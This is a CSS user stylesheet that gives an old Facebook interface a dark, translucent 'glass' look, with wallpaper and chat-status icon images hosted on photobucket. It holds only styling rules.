.timelineUnitContainer,.timelineReportContainer,.aboveUnitContent,.aboutMePagelet,#pagelet_tab_content_friends,#fbProfilePlacesBorder,#pagelet_tab_content_notes,.externalShareUnit,.fbTimelineNavigationWrapper .detail,.tosPaneInfo,.navSubmenu:hover,#bfb_donate_pagelet > div,.better_fb_mini_message,.uiBoxWhite,.uiLoadingIndicatorAsync,.mleButton,.fbTimelineBoxCount,.navSubmenu:hover,.gradient,.profileBrowserGrid tr > td > div,.statsContainer,#admin_panel,.fbTimelineSection, .escapeHatch, .ogAggregationPanelContent, .-cx-PRIVATE-fbTimelineExternalShareUnit__root, .shareUnit a, .storyBox {background: rgba(20,20,20,.4) !important;}\n\n.feed_comments,.home_status_editor,#rooster_container,.rooster_story,.UIFullPage_Container,.UIRoundedBox_Box,.UIRoundedBox_Side,.wallpost,.profile_name_and_status,.tabs_wrapper,.story,#feedwall_controls,.composer_well,.status_composer,.home_main_item,.feed_item,.HomeTabs_tab,#feed_content_section_applications li,.menu_separator,a[href=\"/friends\"],.feed_options_link,.show_all_link,.status,#newsfeed_submenu,.morecontent_toggle_link,.more_link,.composer_tabs,.bl,.profile_tab,.story_posted_item,.left_column,.pager_next,.admarket_ad,.box,.inside,.shade_b,.who_can_tab,.summary_simple,.footer_submit_rounded,.well_content,.info_section,.item_content,.basic_info_summary_and_viewer_actions dt,.info dt,.photo_table,.extra_content,.main_content,.search_inputs,.search_results,.result,.bar,.smalllinks span,.quiz_actionbox,.column,.note_header,.fdh,#fpgc,#fpgc td,.fmp,.fadvfilt,.fsummary,.frn,.two_column_wrapper,#new_ff,.see_more,.message_rows,.message_rows tr,.toggle_tabs li,.toggle_tabs li a,.notifications,.updates_all,.composer,.WelcomePage_MainSellContainer,.WelcomePage_MainSell,.media_gray_bg,.photo_comments_container,.photo_comments_main,.empty_message,.UIMediaHeader_Title,.UIMediaHeader_SubHeader,.footer_bar,.single_photo_header,#editphotoalbum,.covercheck,#newalbum,.panel,.album,.dh_titlebar,.page_content,.dashboard_header,.photos_header,.privacy_summary_items,.privacy_summary_item,.block_overview,.privacy_page_field,.editor_panel,.block,.action_box,.even_column,.mobile_account_inlay,.language,.confirm_boxes,.confirm,.status_confirm,.hasnt_app,.container, .UIDashboardHeader_TitleBar,.UIDashboardHeader_Container,.note,.UITwoColumnLayout_Container,.dialog_body,.dialog_buttons,.group_lists,.group_lists th,.group_list,.updates,.share_section,#profilenarrowcolumn,#profilewidecolumn,#inline_wall_post,.post_link_bar,.helppro_content,.answers_list_header,#help_titlebar,.new_user_guide,.new_user_guide_content,.flag_nav_item,.flag_nav_item a,.arrowlink a,#safety_page,#safety_page h5,.dashbar,.disclaimer,#store_options,#store_window,.step,.canvas_rel_positioning, .app_type a,.sub_selected a,.box_head,.inside_the_box,.app_about,.fallback,.box_subhead,.fbpage_card,#devsite_menubar,.content_sidebar,.side, .pBody li a,#p-logo,#p-navigation,#p-navigation .pBody,#bodyContent h1,#p-wiki,#p-wiki .pBody,#p-search,#p-search .pBody,#p-tb,#p-tb .pBody,#bodyContent table,#bodyContent table div,.recent_news,.main_news,.news_header, .devsite_subtabs li a,.middle-container,.feed_msg h4,.ads_info,.contact_sales,.wrapper h3,.presence_bar_button:hover,.icon_garden_elem:hover,#profile_minifeed,.focused,.dialog_summary,.tab span,.wallkit_postcontent h4,.address,#badges,.badge_holder,.aim_link,.user_status,.section_editor,.my_numbers,.photo_editor,.gift_rows,.sub_menu,.main-nav-tabs li a,.submenu_header,.new_gift,#profile_footer_actions,#status_bar,#summaryandpager,.userlist,#feedBody,#feedHeaderContainer,#feedContent,.feedBackground,.mixer_panel,.titles,.sliders,.slider_holder,.fbpage_title,.options,#linkeditorform,.sideNavItem .item,.typeahead_list_with_shadow,.module,.tc,.bc,.footer, .answer,.announcement,.basic_info_content,.slot,.boardkit_no_topics,.ranked_friend,.boardkit_subtitle,.filter-tabs,.level,.level_summary,.cause, .attachment_stage,.attachment_stage_area,.beneficiary_info,#info_tab,#feedwall_with_composer,.frni,.frni a,.flistedit,.fmp_delete,#feed_content_section_friend_lists li,.composer_tabs li:not(.selected),.menu_content li a,.view_on,.rounded-box,.ffriend,.tab_content,.wrapper_background,.full_container,.white_box,#friends li a,#inline_composer,.skin_body,.invite_tab_selected,.inside table,.matches_matches_box,.matches_content_box_subtitle,tr[fbcontext=\"41097bfeb58d\"],.dialog_body div div,.new_menu_off,.present_info_label,.import_status,.upload_guidelines,.tagger_border,.chat_info,.chat_conv_content,.chat_conv,.visibility_change,.pic_padding,.chat_notice,.chat_input_div,.wrapper,.toolbar_button,.toolbar_button_label,.pages_dashboard_panel,.no_pages,.divider,#filterview,#groupslist,.grouprow,.grouprow table,.board_topic,#big_search,#invitation_list,#invitation_wrapper,.emails_error, .outer_box,.inner_box,.days_remaining,.module,.submodule,.ntab,.ntab .tab_link,.grayheader,.inline_wall_post,.related_box,.home_box_wrapper,.two_column,.challenge_stats,.quiz_box, #fb_challenge,#fb_challenge_page,.challenge_leaderboard,.leaderboard_tile, .sidebar_upsell,.concerts_module,.container_box,#login_homepage,.user_hatch_bg,.pick_main,#homepage,.wall_post_body,.track,.HomeTabs_tab a,.minifeed,.alert_wrap,.logged_in_vertical_alert,.info_column,#public_listing_friends,#public_listing_pages,.gamertag_app,.gamerProfileBody,#photo_picker,.album_picker .page0 .row,.dialog_loading,.timeline,.partyrow,.partyrow table,#invite_list li,.group_info_section,#moveable_wide,.UIProfileBox_Content,.story_content,.settings_panel,.app_browser li,.photos_tab,.recent_notes,.side_note,.album_information,.results,.logged_out_register_vertical,.logged_out_register_wrapper,.deleted,.home_prefs_saved,.share_send,.header_divide,.thread_header,.message,.status_composer_inner,.fbpage_edit_header,.app_switcher_unselected,.status_placeholder,.UIComposer_TDTextArea, .UIHomeBox_Content,.UIHotStory,.home_welcome,.summary_custom,.source_list,.minor_section,.UIComposer_Attachment_TDTextArea,.info_diff span,.matches span,.menu_content,.UIcomposer_Dropdown_List,.UIComposer_Dropdown_Item,.feed_auto_update_settings,.container,.silver_footer,.friend_grid_col,.token > span,.tokenizer_input,.tokenizer_input *,#friends_multiselect,.flink_inner a:hover,#grouptypes,#startagroup p,.UICheckList,.FriendAddingTool_InnerMenu,.pagerpro li a:hover,#friend_filters,.fb_menu_count_holder,.hp_box,.view_all_link,.app_settings_tab,.tab_link,#flm_add_title,#flm_current_title,#flm_list_selector .selector,#friends_header,#friends_wrapper,.contacts_header,.contacts_wrapper,.row1,.show_advanced_controls,.FriendAddingTool_InnerMenu,.UISelectList,.UISelectList_Item,.UIIntentionalStory_CollapsedStories,.email_section,.section_header_bg,.rqbox,.ar_highlight,#buddy_list_panel,.panel_item,.friendlist_status,.options_actions a span,.chat_setting label,.toolbox,.chat_actions,.UIWell,.UIComposer_InputArea,.invite_panel,.apinote,.UIInterstitialBox_Container,.ical_section,.maps_brand,.divbox4,.lighteryellow,.fan_status_inactive,.UIBeeperCap,.footer_fallback_box,.footer_refine_search_company_school_box,.footer_refine_search_email_box,.UINestedFilterList_List,.UINestedFilterList_SubItem,.UINestedFilterList_Item_Link,.UINestedFilterList_Item_Link,.UINestedFilterList_SubItem_Link,.app_dir_app_summary,.app_dir_featured_app_summary,.app_dir_app_wide_summary,.profile_top_bar_container,.UIStream_Border,.question_container,.unselected_list label:nth-child(odd),.request_box,.showcase,.steps li,#fb_sell_profile div,.promotion,.UIOneOff_Container tabs,.whocan,.lock_r,.privacy_edit_link,.friend_list_container li:hover a,.email_field,.app_custom_content,#page,.thumb,.step_frame,.radioset,.radio_option,.page_option,.explanation_note,.card,.empty_albums,.right_column,.full_widget,.connect_top,.creative_preview,.creative_column,.UIAdmgrCreativePreview,.UIEMUASFrame,.banner_wrapper,.dashboard,.pages,#photocrop_instructions,.UIContentBox_GrayDarkTop,.UIContentBox_Gray,.UIContentBox,#FriendsPage_ListingViewContainer,.post_editor,.entry,.fb_dashboard,.spacey_footer,.thread,.post,.UIWashFrame_Content,table[bindpoint=\"thread_row\"],table[bindpoint=\"thread_row\"] tbody,.GBThreadMessageRow,.message_pane,.UIComposer_ButtonArea, .UIRoundedTransparentBox_Border,.feedbackView,.group,.streamPaginator,.nullStatePane,.inboxControls,.filterControls,.inboxView tr,.tabView,.tabView li a,.splitViewContent,.photoGrid,.albumGrid,.frame .img,.gridViewCrop,.gridView,.profileWall form,.story form,.formView,.inboxCompose,.LTokenizerToken,#icon_garden,#buddy_list_tab,#presence_notifications_tab,#editphotoalbum .photo,.UISuggestionList_SubContainer,.fan_action,.video_pane,.notify_option, .video_gallery,.video,.uiTooltip:not(.close):hover,.people_table,.people_table table,#main,#navlist li a.inactive,#rbar,.plays_bar,#fans,.updates_messages,.sent_updates_container,.subitem,#pagelet_navigation,.fbxWelcomeBox,.friends_online_sidebar,.uiTextHighlight,.tab_box,.bordered_list_item,.SettingsPage_PrivacySections,.profile-pagelet-section,.profileInfoSection,#pts_invite_section,.main_body,.masterControl,.masterControl .main,.linkbox,.uiTypeaheadView .search li,.language_form,#ads_privacy_examples,.fbPrivacyPage,.UIStandardFrame_SidebarAds,#sidebar_ads,#globalWrapper #content,.portlet,.pBody,.noarticletext,#catlinksm,.devsiteHeader,.devsiteFooter,.devsiteContent,.blockpost,.blockpost #topic,.blockpost .postleft,.blockpost .postfootleft,.fbRecommendation,.fbRecommendationWidgetContent,.add_comment,.connect_comment_widget .comment_content,.error,.even,.fbFeedbackPager,.uiComposerMessageBox,.facepileHolder,.notePermalinkMaincol,.profilePreviewHeader,.pageAttachment,.editExperienceForm,.tourSteplist,.tourSteplist ol,.uiStep,.uiStep:not(.uiStepSelected) .part, .uiStepSelected .part:not(.middle),.better_fb_cp,legend,.bfb_option_body div,.messaging_nux_header,.fbInsightsTable .odd td,.user.selected,.highlighter div b,.fbQuestionsBlingBox:hover,.friend_list_container,.jewelItemList li a:active,#bfb_tip_pagelet > div,.UIUpcoming_Item,.video_with_comments,.video_info,.fbFeedTickerStory,.fbFeedTicker.fixed_elem,.fbxPhoto .fbPhotoImageStage .stageContainer,#DeveloperAppBody > .content,.opengraph .preview,.coverNoImage,.fbTimelineScrubber,.fbTimelineAds,.fbProfilePlacesFilter,.fbFeedbackPost .UIImageBlock_Content,.permissionsViewEducation,.UIFaq_Container,#wizard,.captionArea,#bfb_options_content .option,.bfb_tab_selector,.UIMessageBoxExplanation,.uiStreamSubstories {background: rgba(20,20,20,.2) !important;}\n\n.uiSelector .uiSelectorButton,.UIRoundedBox_Corner,.quote,.em,.UIRoundedBox_TL,.UIRoundedBox_TR,.UIRoundedBox_BR,.UIRoundedBox_LS,.UIRoundedBox_BL,.profile_color_bar,.pagefooter_topborder,.menu_content,h3,#feed_content_section_friend_lists,ul,li[class=\"\"],.comment_box,.comment,#homepage_bookmarks_show_more,.profile_top_wash,.canvas_container,.composer_rounded,.composer_well,.composer_tab_arrow,.composer_tab_rounded,.tl,.tr,.module_right_line_block,.body,.module_bottom_line,.lock_b_bottom_line,#info_section_info_2530096808 .info dt,.pipe,.dh_new_media,.dh_new_media .br,.frn_inpad,#frn_lists,#frni_0,.frecent span,h3 span,.UIMediaHeader_TitleWash,.editor_panel .right,.UIMediaButton_Container tbody *,#userprofile,.profile_box,.date_divider span,.corner,.profile #content .UIOneOff_Container,.ff3,.photo #nonfooter #page_height,.home #nonfooter #page_height,.home .UIFullPage_Container,.main-nav,.generic_dialog,#fb_multi_friend_selector_wrapper,#fb_multi_friend_selector,.tab span,.tabs,.pixelated,.disabled,.title_header .basic_header,#profile_tabs li,#tab_content,.inside td,.match_link span,tr[fbcontext=\"41097bfeb58d\"] table,.accent,#tags h2,.read_updates,.user_input,.home_corner,.home_side,.br,.share_and_hide,.recruit_action,.share_buttons,.input_wrapper,.status_field,.UIFilterList_ItemRight,.link_btn_style span,.UICheckList_Label,#flm_list_selector .Tabset_selected .arrow,#flm_list_selector .selector .arrow .sel_link,.friendlist_status .title a,.online_status_container,.list_drop_zone_inner,.good_username,.WelcomePage_Container,.UIComposer_ShareButton *,.UISelectList_Label,.UIComposer_InputShadow .UIComposer_TextArea,.UIMediaHeader_TitleWrapper,.boxtopcool_hg,.boxtopcool_trg,.boxtopcool_hd,.boxtopcool_trd,.boxtopcool_bd,.boxtopcool_bg,.boxtopcool_b,#confirm_button,.title_text,#advanced_friends_1,.fb_menu_item_link,.fb_menu_item_link small,.white_hover,.GBTabset_Pill span,.UINestedFilterList_ItemRight,.GBSearchBox_Input input,.inline_edit,.feedbackView .comment th div,.searchroot,.composerView th div,.reply th div,.LTokenizer,.Mentions_Input,form.comment div,.ufi_section,.BubbleCount,.BubbleCount_Right,.UIStory,.object_browser_pager_more,.friendlist_name,.friendlist_name a,.switch,#tagger,.tagger_border,.uiTooltip,#reorder_fl_alert,.UIBeeper_Full,#navSearch,#navAccount,#navAccountPic,#navAccountName,#navAccountInfo,#navAccountLink,#mailBoxItems,#pagelet_chat_home h4,.buddy_row,.home_no_stories,#xpageNav li .navSubmenu,.uiListItem:not(.ufiItem),.uiBubbleCount,.number,.fbChatBuddylistPanel,.wash,.settings_screenshot,.privacyPlan .uiListItem:hover,.no_border,.auxiliary .highlight,.emu_comments_box_nub,.numberContainer,.uiBlingBox,.uiBlingBox:hover span,.callout_buttons,.uiWashLayoutEmptyGradientWash,.inputContainer,.editNoteWrapperInput,.fbTextEditorToolbar,.logoutButton input,#contentArea .uiHeader + .uiBoxGray,.uiTokenizer,#bfb_tabs,.profilePictureNuxHighlight,.profile-picture,#ci_module_list,.textBoxContainer,#date_form .uiButton,.insightsDateRange,.MessagingReadHeader,.groupProfileHeaderWash,.questionSectionLabel,.metaInfoContainer,.uiStepList ol,.friend_list,.fbFeedbackMentions,.bb .fbNubFlyoutHeader,.bb .fbNubFlyoutFooter,.fbNubFlyoutInner .fbNubFlyoutFooter,.gradientTop,.gradientBottom,.helpPage,.fbEigenpollTypeahead .plus,.uiSearchInput,.opengraph,#developerAppDetailsContent,.timelineLayout #contentCol,.attachmentLifeEvents,.fbProfilePlacesFilterBar,.uiStreamHeader,.uiStreamHeaderChronologicalForm,.inner .text,.pageNotifPopup,.uiButtonGroup,.navSubmenuPageLink,.fbTimelineTimePeriod,.bornUnit,.mleFooter,#bfb_filter_add_row,#bfb_options .option .no_hover,.fbTimelinePhotosSeparator h4 span,.withsubsections,.showMore,.event_profile_information tr:hover,.nux_highlight_nub,.uiSideNav .uiCloseButton,.uiSideNav .uiCloseButton input,.fb_content,.uiComposerAttachment .selected .attachmentName,.fbHubsTokenizer,.coverEmptyWrap,.uiStreamHeaderText,.pagesTimelineButtonPagelet,.fbNubFlyoutBody,#pageNav .tinyman:hover,#navHome:hover,.fbRemindersThickline,.uiStreamEdgeStoryLine hr,.uiInfoTable tbody tr:hover,.fbTimelineUFI,#contentArea,.leftPageHead,.rightPageHead,.anchorUnit,#pageNav .topNavLink a:focus,.timeline_page_inbox_bar,.uiStreamEdgeStoryLineTx,.pluginRecommendationsBarButton,.pluginRecommendationsBarTop table, .uiToken, .ogAggregationPanelText, .UFIRow {background: transparent !important;}\n\n.UIObject_SelectedItem,.sidebar_item_header,.announcement_title,#pagefooter,.selected:not(.key-messages):not(.key-events):not(.key-media):not(.key-ff):not(.page):not(.group):not(.user):not(.app),.date_divider_label,.profile_action,.blurb ,.tabs_more_menu,.more a span,.selected h2,.column h2,.ffriends,.make_new_list_button_table tr,.title_header,.inbox_menu,.side_column,.section_header h3 span,.media_header,#album_container,.note_dialog,.dialog,.has_app,.UIMediaButton_Container,.dialog_title,.dialog_content,#mobile_notes_announcement,.see_all,#profileActions,.fbpage_group_title,.UIProfileBox_SubHeader,#profileFooter,.share_header,#share_button_dialog,.flag_nav_item_selected,.new_user_guide_content h2,#safety_page h4,.section_banner,.box_head,#header_bar,.content_sidebar h3,.content_header,#events h3,#blog h3,.footer_border_bottom,.firstHeading,#footer,.recent_news h3,.wrapper div h2,.UIProfileBox_Header,.box_header,.bdaycal_month_section,#feedTitle,.pop_content,#linkeditor,.UIMarketingBox_Box,.utility_menu a,.typeahead_list,.typeahead_suggestions,.typeahead_suggestion,.fb_dashboard_menu,.green_promotion,.module h2,.current_path,.boardkit_title,.current,.see_all2,.plain,.share_post,.add-link,li.selected,.active_list a,#photoactions a:not(#rotaterightlink):not(#rotateleftlink),.UIPhotoTagList_Header,.dropdown_menu,.menu_content,.menu_content li a:hover,.menu_content li:hover,#edit_profilepicture,.menu_content div a:hover,.contact_email_pending,.req_preview_guts,.inputbutton,.inputsubmit,.activation_actions_box,.wall_content,.matches_content_box_title,.new_menu_selected,#editnotes_content,#file_browser,.chat_window_wrapper,.chat_window,.chat_header,.hover,.dc_tabs a,.post_header,.header_cell,#error,.filters,.pages_dashboard_panel h2,.srch_landing h2,.bottom_tray,.next_action,.pl-divider-container,.sponsored_story,.header_current,.discover_concerts_box,.header,.sidebar_upsell_header,.activity_title h2,.wall_post_title,#maps_options_menu,.menu_link,.gamerProfileTitleBar,.feed_rooster ,.emails_success,.friendTable table:hover,.board_topic:hover,.fan_table table:hover,#partylist .partyrow:hover,.latest_video:hover,.wallpost:hover,.profileTable tr:hover,.friend_grid_col:hover,.bookmarks_list li:hover,.requests_list li:hover,.birthday_list li:hover,.tabs li,.fb_song:hover,.share_list .item_container:hover,.written a:hover,#photos_box .album:hover,.people .row .person:hover,.group_list .group:hover,.confirm_boxes .confirm:hover,.posted .share_item_wide .share_media:hover,.note:hover,.editapps_list .app_row:hover,.my_networks .blocks .block:hover,.mock_h4,#notification_options tr:hover,.notifications_settings li:hover,.mobile_account_main h2,.language h4,.products_listing .product:hover,.info .item .item_content:hover,.info_section:hover,.recent_notes p:hover,.side_note:hover,.suggestion,.story:hover,.post_data:hover,.album_row:hover,.track:hover,#pageheader,.message:hover,input[type=\"submit\"]:not(.fg_action_hide):not(.stat_elem):not([name=\"add\"]):not([name=\"actions[reject]\"]):not([name=\"actions[accept]\"]):not([value=\"Find Friends\"]):not([value=\"Share\"]):not([value=\"Maybe\"]):not([value=\"No\"]):not([value=\"Yes\"]):not([value=\"Comment\"]):not([value=\"Reply\"]):not([value=\"Flag\"]):not([type=\"submit\"]),.UITabGrid_Link:hover,.UIActionButton,.UIActionButton_Link,.confirm_button,.silver_dashboard,span.button,.col:hover,#photo_tag_selector,#pts_userlist,.flink_dropdown,.flink_inner,.grouprow:hover,#findagroup h4,#startagroup h4,.actionspro a:hover,.UIActionMenu_Menu,.UICheckList_Label:hover,.make_new_list_button_table,.contextual_dialog_content,#flm_list_selector .selector:hover,.show_advanced_controls:hover,.UISelectList_check_Checked,.section_header,.section_header_bg,#buddy_list_panel_settings_flyout,.options_actions,.chat_setting,.flyout,.flyout .UISelectList,.flyout .new_list,#tagging_instructions,.FriendsPage_MenuContainer,.UIActionMenu,.UIObjectListing:hover,.UIStory_Hide .UIActionMenu_Wrap,.UIBeeper,.branch_notice,.async_saving,.UIActionMenu .UIActionMenu_Wrap:hover,.attachment_link a:hover,.UITitledBox_Top,.UIBeep,.Beeps,#friends li a:hover,.apinote h2,.UIActionButton_Text,.rsvp_option:hover,.onglettrhi,.ongletghi,.ongletdhi,.ongletg,.onglettr,.ongletd,.confirm_block, .unfollow_message,.UINestedFilterList_SubItem_Selected .UINestedFilterList_SubItem_Link,.UINestedFilterList_SubItem_Link:hover,.UINestedFilterList_Item_Link:hover,.UINestedFilterList_Selected .UINestedFilterList_Item_Link,.app_dir_app_summary:hover,.app_dir_featured_app_summary:hover,.app_dir_app_wide_summary:hover,.UIStory:hover,.UIPortrait_TALL:hover,.UIActionMenu_Menu div,.UIButton_Blue,.UIButton_Gray,.quiz_cell:hover,.UIFilterList > .UIFilterList_Title,.message_rows tr:hover,.ntab:hover,.thumb_selected,.thumb:hover,.hovered a,.pandemic_bar,.promote_page,.promote_page a,.create_button a,.nux_highlight,.UIActionMenu_Wrap,.share_button_browser div,.silver_create_button,.painted_button,.flyer_button,table[bindpoint=\"thread_row\"] tbody tr:hover,.GBThreadMessageRow:hover,#header,.button:not(.close):not(.uiSelectorButton):not(.videoicon):not(.toggle),h4,button:not(.as_link),#navigation a:hover,.settingsPaneIcon:hover,a.current,.inboxView tr:hover,.tabView li a:hover,.friendListView li:hover,.LTypeaheadResults,.LTypeaheadResults a:hover,.dialog-title, .UISuggestionList_SubContainer:hover,.typeahead_message,.progress_bar_inner,.video:hover,.advanced_controls_link,.plays_val,.lightblue_box,.FriendAddingTool_InnerMenu .UISelectList,.gray_box,.uiButton:not(.uiSelectorButton),.fbPrivacyWidget .uiSelectorButton:not(.lockButton),.uiButtonSuppressed,#navAccount li:not(#navAccountInfo),.jewelHeader,.seeMore,#mailBoxItems li,#pageFooter,.uiSideNav .key-nf:hover,.key-messages .item:hover,.key-messages ul li:hover,.key-events ul li:hover,.key-media ul li:hover,.key-ff ul li:hover,.key-apps:hover,.key-games:hover,.uiSideNav .sideNavItem:not(.open) .item:hover,.fbChatOrderedList .item:hover a,.uiHeader,.uiListItem:not(.mall_divider):hover,.uiSideNav li.selected > a,.ego_unit:hover,.results,.bordered_list_item:hover,.fbConnectWidgetFooter,#viewas_header,.fbNubFlyoutTitlebar,.info_text,.stage,.masterControl .selected a,.masterControl .controls .item a:hover,.uiTypeaheadView .search,.gigaboxx_thread_hidden_messages,.uiMenu,.uiMenuInner,.itemAnchor,.gigaboxx_thread_branch_message,.uiSideNavCount,.uiBoxYellow,.loggedout_menubar_container,.pbm .uiComposer,.megaphone_box,.uiCenteredMorePager,.fbEditProfileViewExperience:hover,.uiStepSelected .middle,.GM_options_header,.bfb_tab_selected, #MessagingShelfContent,.connect_widget_like_button,.uiSideNav .open,.fbActivity:hover,.fbQuestionsPollResultsBar,.insightsDateRangeCustom,.fbInsightsTable thead th,.mall_divider,.attachmentContent .fbTabGridItem:hover,.jewelItemNew,#MessagingThreadlist .unread,.type_selected,.bfb_sticky_note,.UIUpcoming_Item:hover,.progress_bar_outer,.fbChatBuddyListDropdown .uiButton,.UIConnectControlsListSelector .uiButton,.instructions,.uiComposerMetaContainer,.uiMetaComposerMessageBoxShelf,#feed_nux,#tickerNuxStoryDiv,.fbFeedTickerStory:hover,.fbCurrentStory:hover,.uiStream .uiStreamHeaderTall,.fbChatSidebarMessage,.fbPhotoSnowboxInfo,.devsitePage .menu,.devsitePage .menu .content,#devsiteHomeBody .wikiPanel > div,.toolbarContentContainer,.fbTimelineUnitActor,#fbTimelineHeadline,.fbTimelineNavigation,.fbTimelineFeedbackActions,.timelineReportHeader,.fbTimelineCapsule .timelineUnitContainer:hover,.timelineReportContainer:hover,.fbTimelineComposerAttachments .uiListItem:hover span a,.timelinePublishedToolbar,.timelineRecentActivityLabel,.fbTimelineMoreButton,.overlayTitle,.friendsBoxHeader,.escapeHatchHeader,.tickerStoryAllowClick,.appInvite:hover,.fbRemindersStory:hover,.lifeEventAddPhoto a:hover,.insights-header,.ufb-dataTable-header-container,.ufb-button,.older-posts-content,.mleButton:hover,.btnLink,.fill,.cropMessage,.adminPanelList li:hover a,.tlPageRecentOverlayStream,.addListPageMegaphone,.searchListsBox,.ogStaticPagerHeader,.dialogTitle,#rogerSidenavCallout,.fbTimelineAggregatedMapUnitSeeAll,.shareRedesignContainer,.ogSingleStoryText,.ogSliderAnimPagerPrevWrapper,.ogSliderAnimPagerNextWrapper,.shareRedesignText,.pluginRecommendationsBarTop,.timelineRecentActivityStory:hover, .ogAggregationPanelUFI\n{ background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Wallpaper/GlassShiny.png\") fixed repeat !important;}\n\n.hovercard .stage,.profileChip,.GM_options_wrapper_inner,.MessagingReadHeader .uiHeader,#MessagingShelf,#navAccount ul,.uiTypeaheadView,#blueBar,.uiFacepileItem .uiTooltipWrap,.fbJewelFlyout,.jewelItemList li,.notification:not(.jewelItemNew),.fbNubButton,.fbChatTourCallout .body,.uiContextualDialogContent,.fbTimelineStickyHeader .back,.timelineExpandLabel:hover,.pageNotifFooter a,.fbSettingsListLink:hover,.uiOverlayPageContent,#bfb_option_list,.fbPhotoSnowlift .rhc,.ufb-tip-title,.balloon-content,.tlPageRecentOverlayTitle,.uiDialog,.uiDialogForm,.permissionsLockText, .uiMenuXBorder,.-cx-PRIVATE-uiDialog__content,.-cx-PRIVATE-uiDialog__title, ._k5\n{ background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Wallpaper/GlassShiny.png\") fixed repeat, rgba(10,10,10,.6) !important; }\n\n.unread .badge,.fbDockChatBuddyListNub .icon,.sx_7173a9,.selectedCheckable .checkmark {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/blueball15.png\") no-repeat right center!important;}\n\ntable[class=\" \"] .badge:hover,table[class=\"\"] .badge:hover,.offline .fbDockChatBuddyListNub .icon,.fbChatSidebar.offline .fbChatSidebarMessage .img {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/grayball15.png\") no-repeat right center!important;}\n\n.fbChatSidebar.offline .fbChatSidebarMessage .img {height: 16px !important;}\n\n.offline .fbDockChatBuddyListNub .icon,.fbDockChatBuddyListNub .icon,.sx_7173a9 {margin-top: 0 !important;height: 15px !important;}\n\na.idle,.buddyRow.idle .buddyBlock,.fbChatTab.idle .tab_availability,.fbChatTab.disabled .tab_availability,.chatIdle .chatStatus,.idle .fbChatUserTab .wrap,.chatIdle .uiTooltipText,.markunread,.bb .fbDockChatTab.user.idle .titlebarTextWrapper,.fbChatOrderedList .item:not(.active) .status {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/grayball10paddedright.png\") no-repeat left center !important;}\n\n.fbChatOrderedList .item .status {width: 10px !important;}\n\n.headerTinymanName {max-width: 320px !important; white-space: nowrap !important; overflow: hidden !important;}\n\n.uiTooltipText {padding-left: 14px !important;border: none !important;}\n \n.fbNubButton,.bb .fbNubFlyoutTitlebar,.bb .fbNub .noTitlebar,.fbDockChatTab,#fbDockChatBuddylistNub .fbNubFlyout,.fbDockChatTabFlyout,.titlebar {border-radius: 8px 8px 0 0!important;}\n\n.uiSideNav .open {padding-right: 0 !important;}\n.uiSideNav .open,.uiSideNav .open > *,#home_stream > *,.bb .rNubContainer .fbNub,.fbChatTab {margin-left: 0 !important;}\n.uiSideNav .open ul > * {margin-left: -20px !important;}\n.uiSideNav .open .subitem > .rfloat {margin-right: 20px !important;}\n\n.timelineUnitContainer .timelineAudienceSelector .uiSelectorButton {padding: 1px !important; margin: 4px 0 0 4px !important;}\n.timelineUnitContainer .audienceSelector .uiButtonNoText .customimg {margin: 2px !important;}\n.timelineUnitContainer .composerAudienceSelector .customimg {opacity: 1 !important; background-position: 0 1px !important; padding: 0 !important;}\n\n.fbNub.user:not(.disabled) .wrap {padding-left: 15px !important;}\n.fbNubFlyoutTitlebar .titlebarText {padding-left: 12px !important;}\n\na.friend:not(.idle),.buddyRow:not(.idle) .buddyBlock,.fbChatTab:not(.idle):not(.disabled) .tab_availability,.chatOnline .chatStatus,.markread,.user:not(.idle):not(.disabled) .fbChatUserTab .wrap,.chatOnline .uiTooltipText,.bb .fbDockChatTab.user:not(.idle):not(.disabled) .titlebarTextWrapper,.fbChatOrderedList .item.active .status,.active .titlebarTextWrapper,.uiMenu .checked .itemAnchor {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/blueball10paddedright.png\") no-repeat !important;}\n\na.friend:not(.idle),.buddyRow:not(.idle) .buddyBlock,.fbChatTab:not(.idle):not(.disabled) .tab_availability,.chatOnline .chatStatus,.markread,a.idle,.buddyRow.idle .buddyBlock {background-position: right center !important;}\n\n.user:not(.idle):not(.disabled) .fbChatUserTab .wrap,.chatOnline .uiTooltipText,.bb .fbDockChatTab.user:not(.idle):not(.disabled) .titlebarTextWrapper,.fbChatOrderedList .item.active .status,.active .titlebarTextWrapper,.user .fbChatUserTab .wrap {background-position: left center !important;}\n\n.uiMenu .checked .itemAnchor {background-position: 5px center !important;}\n\n.markunread,.markread {background-position: 0 center !important;}\n\n.chatIdle .chatStatus,.chatOnline .chatStatus {width: 10px !important;height: 10px !important;background-position: 0 0 !important;}\n\n#fbRequestsJewel .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Friends-Gray.png\") no-repeat center center !important;}\n\n#fbRequestsJewel:hover .jewelButton,#fbRequestsJewel.hasNew .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Friends.png\") no-repeat center center !important;}\n\n#fbMessagesJewel .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Mail_Icon-gray.png\") no-repeat center center !important;}\n\n#fbMessagesJewel:hover .jewelButton,#fbMessagesJewel.hasNew .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Mail_Icon.png\") no-repeat center center !important;}\n\n#fbNotificationsJewel .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Earth-gray.png\") no-repeat center center !important;}\n\n#fbNotificationsJewel:hover .jewelButton,#fbNotificationsJewel.hasNew .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Earth.png\") no-repeat center center !important;}\n\n.topBorder,.bottomBorder {background: #000 !important;}\n\n.pl-item,.ical,.pop_content {background-color: #333 !important;}\n.pl-alt {background-color: #222 !important;}\n\n.friend:hover,.friend:not(.idle):hover,.fbTimelineRibbon {background-color: rgba(10,10,10,.6) !important;}\n\n.maps_arrow,#sidebar_ads,.available .x_to_hide,.left_line,.line_mask,.chat_input_border,.connect_widget_button_count_nub,\n.uiStreamPrivacyContainer .uiTooltip 